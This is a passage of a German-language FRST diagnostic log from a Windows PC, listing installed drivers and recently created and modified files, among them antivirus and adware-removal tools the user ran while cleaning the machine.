C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG) R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros) S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation) R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-31] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation) S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA) R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated) R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation) R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-31 12:39 - 2016-03-31 12:40 - 00015188 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-31 12:29 - 2016-03-31 12:29 - 00000868 _____ C:\Users\Denny\Desktop\Fixlog.txt 2016-03-30 23:51 - 2016-03-30 23:51 - 02870984 _____ (ESET) C:\Users\Denny\Downloads\esetsmartinstaller_deu.exe 2016-03-30 14:03 - 2016-03-30 14:03 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-30 13:51 - 2016-03-30 12:59 - 00024064 _____ C:\WINDOWS\zoek-delete.exe 2016-03-30 12:59 - 2016-03-30 13:44 - 00000000 ____D C:\zoek_backup 2016-03-30 12:59 - 2016-03-30 12:59 - 01309184 _____ C:\Users\Denny\Downloads\zoek.exe 2016-03-30 12:48 - 2016-03-30 12:48 - 00000749 _____ C:\Users\Denny\Desktop\Revo Uninstaller.lnk 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\Desktop\Revo Uninstaller 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2016-03-30 12:45 - 2016-03-30 12:45 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Denny\Downloads\revosetup95.exe 2016-03-29 19:15 - 2016-03-29 19:35 - 00197204 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_19.15.23_log.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 16:48 - 2016-03-31 12:32 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-30 15:00 - 00000000 ____D C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-31 12:39 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-31 12:36 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-31 12:36 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-31 12:36 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-31 12:36 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-31 12:32 - 2013-10-24 13:02 - 00000000 ___DO C:\Users\Denny\SkyDrive 2016-03-31 12:30 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-31 12:29 - 2014-05-16 21:31 - 00000000 ____D C:\temp 2016-03-31 02:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-30 16:56 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-03-30 16:55 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-30 14:03 - 2015-11-01 22:59 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-30 13:47 - 2016-01-28 22:26 - 00000000 ____D C:\Users\Denny\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Comodo 2016-03-30 12:54 - 2013-09-09 15:29 - 00000000 ____D C:\Program Files (x86)\Google 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2014-12-24 23:20 - 00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 